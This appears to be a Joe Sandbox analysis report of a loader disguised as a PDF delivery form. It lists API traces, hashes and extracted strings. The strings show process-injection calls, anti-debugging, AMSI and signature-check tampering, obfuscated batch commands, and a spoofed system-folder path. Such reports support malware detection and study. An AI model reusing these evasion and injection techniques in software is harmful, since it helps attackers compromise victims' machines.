                                                                  • Opcode Fuzzy Hash: 6a6f979b1732c5d1ef093e49965bed6375298b8b18c76d7e2fcce49be83a6691
                                                                  • Instruction Fuzzy Hash: 26112975640209AFEF14EFA4DC41E9EB7AEEB4C710F518874BA06D7640DA30EA15DB60
                                                                  APIs
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072
                                                                    • Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D
                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CE82C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                  • String ID: ntdll$yromeMlautriVdaeRtN
                                                                  • API String ID: 2521977463-737317276
                                                                  • Opcode ID: 272db0e167f880a8b86daf1364400924b90d87704e59733089b9d8d0dd98f58d
                                                                  • Instruction ID: 1161de7225802bc269344eb4561195d7712dd8edfd535c8ed5638a53300538f3
                                                                  • Opcode Fuzzy Hash: 272db0e167f880a8b86daf1364400924b90d87704e59733089b9d8d0dd98f58d
                                                                  • Instruction Fuzzy Hash: FF012975640209AFEF10EFA8D841E9E77EEEB48700F514960F609D7610DA30ED149B64
                                                                  APIs
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072
                                                                    • Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D
                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CE7D74
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                  • String ID: Ntdll$yromeMlautriVetirW
                                                                  • API String ID: 2719805696-3542721025
                                                                  • Opcode ID: e243d2b028791b9d16ee500363ab48e43e0af49580f61ee35aa780f01801b552
                                                                  • Instruction ID: 50f715fafdfab8189f5cec5ce750b58905c56205bae29b95a6db04310cc00069
                                                                  • Opcode Fuzzy Hash: e243d2b028791b9d16ee500363ab48e43e0af49580f61ee35aa780f01801b552
                                                                  • Instruction Fuzzy Hash: 52010C75600209AFEF10EFA8E841EAEB7EDEB48710F514860F60AD7750D670EE149F64
                                                                  APIs
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072
                                                                    • Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D
                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 02CE8529
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                  • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                  • API String ID: 3503870465-2520021413
                                                                  • Opcode ID: c357517166e126c8d7039cee29f929ce610b0cd217d84518060ccc0bf2d05402
                                                                  • Instruction ID: 385c59ecc4b65b87accbc5146693d1455778a29f45769757d13bd22b54dfbcf2
                                                                  • Opcode Fuzzy Hash: c357517166e126c8d7039cee29f929ce610b0cd217d84518060ccc0bf2d05402
                                                                  • Instruction Fuzzy Hash: CB014F74640204AFEF14EBA4DC41A9E77AEEB49710F524960B54697650DA30EE119E24
                                                                  APIs
                                                                  • RtlInitUnicodeString.NTDLL(?,?), ref: 02CEDA6C
                                                                  • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02CEDABE), ref: 02CEDA82
                                                                  • NtDeleteFile.NTDLL(?), ref: 02CEDAA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFileInitStringUnicode
                                                                  • String ID:
                                                                  • API String ID: 3559453722-0
                                                                  • Opcode ID: 9db9663e32b827a0405ba8f2e251b28330269b3f58b25311ac64e5e319265cd9
                                                                  • Instruction ID: a2f91796a32e3a5ef8421a4502ab6a918e623360509b048ddca9a2dfd1edb94f
                                                                  • Opcode Fuzzy Hash: 9db9663e32b827a0405ba8f2e251b28330269b3f58b25311ac64e5e319265cd9
                                                                  • Instruction Fuzzy Hash: 87014B75A88348AEEF05EAA08941BCD77BDAB44704F5000A2A212E6081DB74AB049B25
                                                                  APIs
                                                                    • Part of subcall function 02CD4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02CD4EDA
                                                                  • RtlInitUnicodeString.NTDLL(?,?), ref: 02CEDA6C
                                                                  • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02CEDABE), ref: 02CEDA82
                                                                  • NtDeleteFile.NTDLL(?), ref: 02CEDAA1
                                                                    • Part of subcall function 02CD4C0C: SysFreeString.OLEAUT32(02CEE950), ref: 02CD4C1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocDeleteFileFreeInitUnicode
                                                                  • String ID:
                                                                  • API String ID: 2841551397-0
                                                                  • Opcode ID: 56da114b52dfe499ce9d1c0bf4eb4f31c3360b969fc3763069c8e36b6e6df51b
                                                                  • Instruction ID: 7b8832c0b7c5cb911f1ad19a802436468e98387f430078cadb0215813e339eb9
                                                                  • Opcode Fuzzy Hash: 56da114b52dfe499ce9d1c0bf4eb4f31c3360b969fc3763069c8e36b6e6df51b
                                                                  • Instruction Fuzzy Hash: CC01EC71A44208BAEB15EAE0CD52FCEB3BDEB48700F504471A602E2580EB75AB04AE64
                                                                  APIs
                                                                    • Part of subcall function 02CE6CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,02CE6D41,?,?,?,00000000), ref: 02CE6D21
                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,02CE6E34,00000000,00000000,02CE6DB3,?,00000000,02CE6E23), ref: 02CE6D9F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFromInstanceProg
                                                                  • String ID:
                                                                  • API String ID: 2151042543-0
                                                                  • Opcode ID: 8138fa24d949272b2497f5c5f078b992e40345ab1f83ad9ab2d44c94431eb22f
                                                                  • Instruction ID: 895135b7c395a11d7ad1366ef83d0d77158a769ac1ae5c34199dadec29ff6a9c
                                                                  • Opcode Fuzzy Hash: 8138fa24d949272b2497f5c5f078b992e40345ab1f83ad9ab2d44c94431eb22f
                                                                  • Instruction Fuzzy Hash: 76012631218744AEFB15EF64DC5286FBBADEB59B10BB24435FA02E3680E6349E00D960
                                                                  APIs
                                                                  • InetIsOffline.URL(00000000,00000000,02CFAFA1,?,?,?,000002F7,00000000,00000000), ref: 02CEECAE
                                                                    • Part of subcall function 02CE8824: LoadLibraryA.KERNEL32(00000000,00000000,02CE890B), ref: 02CE8858
                                                                    • Part of subcall function 02CE8824: FreeLibrary.KERNEL32(74F60000,00000000,02D31388,Function_000065D8,00000004,02D31398,02D31388,05F5E0FF,00000040,02D3139C,74F60000,00000000,00000000,00000000,00000000,02CE890B), ref: 02CE88EB
                                                                    • Part of subcall function 02CEEB94: GetModuleHandleW.KERNEL32(KernelBase,?,02CEEF98,UacInitialize,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,ScanString,02D3137C,02CFAFD8,Initialize), ref: 02CEEB9A
                                                                    • Part of subcall function 02CEEB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02CEEBAC
                                                                    • Part of subcall function 02CEEBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 02CEEC00
                                                                    • Part of subcall function 02CEEBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02CEEC12
                                                                    • Part of subcall function 02CEEBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CEEC29
                                                                    • Part of subcall function 02CD7E18: GetFileAttributesA.KERNEL32(00000000,?,02CEF8CC,ScanString,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanString,02D3137C,02CFAFD8,UacScan,02D3137C,02CFAFD8,UacInitialize), ref: 02CD7E23
                                                                    • Part of subcall function 02CDC2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E258C8,?,02CEFBFE,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,OpenSession), ref: 02CDC303
                                                                    • Part of subcall function 02CEDBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02CEDC80), ref: 02CEDBEB
                                                                    • Part of subcall function 02CEDBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02CEDC80), ref: 02CEDC1B
                                                                    • Part of subcall function 02CEDBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02CEDC30
                                                                    • Part of subcall function 02CEDBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02CEDC5C
                                                                    • Part of subcall function 02CEDBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02CEDC65
                                                                    • Part of subcall function 02CD7E3C: GetFileAttributesA.KERNEL32(00000000,?,02CF2A49,ScanString,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,Initialize), ref: 02CD7E47
                                                                    • Part of subcall function 02CD7FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02CF2BE7,OpenSession,02D3137C,02CFAFD8,ScanString,02D3137C,02CFAFD8,Initialize,02D3137C,02CFAFD8,ScanString,02D3137C,02CFAFD8), ref: 02CD7FDD
                                                                    • Part of subcall function 02CEDACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02CEDB9E), ref: 02CEDB0B
                                                                    • Part of subcall function 02CEDACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CEDB45
                                                                    • Part of subcall function 02CEDACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02CEDB72
                                                                    • Part of subcall function 02CEDACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02CEDB7B
                                                                    • Part of subcall function 02CE87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000864,00000000,02D313A4,02CEA3C7,ScanString,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,Initialize,02D313A4,02CEA77C,UacScan), ref: 02CE87B4
                                                                    • Part of subcall function 02CE87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CE87CE
                                                                    • Part of subcall function 02CE87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000864,00000000,02D313A4,02CEA3C7,ScanString,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,Initialize), ref: 02CE880A
                                                                    • Part of subcall function 02CE870C: LoadLibraryW.KERNEL32(amsi), ref: 02CE8715
                                                                    • Part of subcall function 02CE870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02CE8774
                                                                  • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,02CFB330), ref: 02CF49B7
                                                                    • Part of subcall function 02CEDA44: RtlInitUnicodeString.NTDLL(?,?), ref: 02CEDA6C
                                                                    • Part of subcall function 02CEDA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02CEDABE), ref: 02CEDA82
                                                                    • Part of subcall function 02CEDA44: NtDeleteFile.NTDLL(?), ref: 02CEDAA1
                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 02CF4BB7
                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 02CF4C0D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                  • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                  • API String ID: 3130226682-181751239
                                                                  • Opcode ID: ea871028fe7b9ea25244891f9de01eee779dc0c8e4400e1c750b46444223fe77
                                                                  • Instruction ID: 5e23456dbffcbfa304cc462c7968a574bd300634beab4c34eeeb663a65c7d706
                                                                  • Opcode Fuzzy Hash: ea871028fe7b9ea25244891f9de01eee779dc0c8e4400e1c750b46444223fe77
                                                                  • Instruction Fuzzy Hash: FF240D75A501588BDB75EB64CD80ADDB3BAFF88310F1141E5E309AB250DB31AE86EF50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 5348 2cf7878-2cf7c67 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd4898 5463 2cf7c6d-2cf7e40 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd4798 call 2cd494c call 2cd4d20 call 2cd4d9c CreateProcessAsUserW 5348->5463 5464 2cf8af1-2cf8c74 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd4898 5348->5464 5571 2cf7ebe-2cf7fc9 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 5463->5571 5572 2cf7e42-2cf7eb9 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 5463->5572 5553 2cf8c7a-2cf8c89 call 2cd4898 5464->5553 5554 2cf9420-2cfaa25 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 * 16 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 